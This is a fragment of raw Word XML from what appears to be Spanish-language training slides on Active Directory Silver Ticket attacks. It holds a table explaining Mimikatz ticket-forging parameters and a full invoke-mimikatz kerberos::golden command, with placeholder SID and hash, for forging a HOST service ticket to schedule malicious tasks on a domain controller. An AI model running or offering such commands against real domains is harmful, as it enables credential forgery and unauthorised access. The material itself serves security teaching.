            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>sid:xxx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E9EBF5"/>
          </w:tcPr>
          <w:p w14:paraId="65E36D0B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="1"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Valor SID del dominio</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="2A14D38F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="818"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="51DE69B2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="71"/>
              <w:ind w:right="4"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>objetivo:empresa-dc.ciberguerra.corp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="5C89B5EB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="2"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>FQDN del servidor de destino</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="72AF2A60" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="718"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E9EBF5"/>
          </w:tcPr>
          <w:p w14:paraId="7C04F0F5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="71"/>
              <w:ind w:right="2"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Ptt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E9EBF5"/>
          </w:tcPr>
          <w:p w14:paraId="649CE94D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="2"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Inyecta el ticket en la sesión actual (memoria)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="1B7D023F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="988"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="44F9AB4C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="72"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>servicio:cifs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="392D575B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="63" w:line="235" w:lineRule="auto"/>
              <w:ind w:left="3141" w:right="0" w:hanging="2530"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Nombre del SPN de servicio para el que se crearía TGS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="5BB5D87E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="668"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E9EBF5"/>
          </w:tcPr>
          <w:p w14:paraId="25CBE99B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="72"/>
              <w:ind w:right="5"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>/Desplazamiento inicial:0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E9EBF5"/>
          </w:tcPr>
          <w:p w14:paraId="1ACD9410" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="57"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Establecer la hora del ticket en la última (actual)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="3E865112" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="668"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="6A3F39D4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="72"/>
              <w:ind w:right="2"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>/endin:600</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="169A74FA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="57"/>
              <w:ind w:right="2"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">600 segundos (10 minutos) de forma </w:t>
            </w:r>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>predeterminada 10 años</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="0EA3BA97" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="668"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E9EBF5"/>
          </w:tcPr>
          <w:p w14:paraId="41E0E67F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="72"/>
              <w:ind w:right="5"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>/renovarmax:10080</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E9EBF5"/>
          </w:tcPr>
          <w:p w14:paraId="6BF7707F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="57"/>
              <w:ind w:right="2"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>7 días (10080 seg)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A39EF79" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="TableParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="920" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BA4CCC6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo7"/>
        <w:spacing w:line="560" w:lineRule="exact"/>
        <w:ind w:left="432"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-&gt; Ejecución de comandos usando Silver Ticket:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C509D46" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="121"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BAE5C00" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1512"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:right="1213"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Los adversarios crean un boleto plateado para </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>el servicio HOST que les permite programar una tarea maliciosa en el objetivo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0C301D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D9E8048" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="90"/>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11744" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="19468CF6" wp14:editId="429A7349">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>798576</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>233110</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="10814685" cy="1282065"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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685" cy="1282065"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="13F251DD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="214"/>
                              <w:ind w:left="136"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>invoke-mimikatz -comando '"</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>kerberos</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>::golden /</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>usuario:administrador</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> /</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>dominio:cyberwarfare.corp</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> /sid:S-1-</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="523B5610" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="234"/>
                              <w:ind w:left="136"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="2"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>5-21-xxxxxx-yyyy-zzzzz /</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="2"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>target:exterprise-dc.cyberwarfare.corp</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="2"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> /</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="2"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>service:HOST</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="2"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> /rc4:xxxxx /id:500</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4961884B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="234"/>
                              <w:ind w:left="136"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>/groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="19468CF6" id="Textbox 577" o:spid="_x0000_s1296" type="#_x0000_t202" style="position:absolute;margin-left:62.9pt;margin-top:18.35pt;width:851.55pt;height:100.95pt;z-index:-15604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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="13F251DD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="214"/>
                        <w:ind w:left="136"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>invoke-mimikatz -comando '"</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>kerberos</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>::golden /</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>usuario:administrador</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> /</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>dominio:cyberwarfare.corp</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> /sid:S-1-</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="523B5610" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="234"/>
                        <w:ind w:left="136"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="2"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>5-21-xxxxxx-yyyy-zzzzz /</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="2"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>target:exterprise-dc.cyberwarfare.corp</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="2"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> /</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="2"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
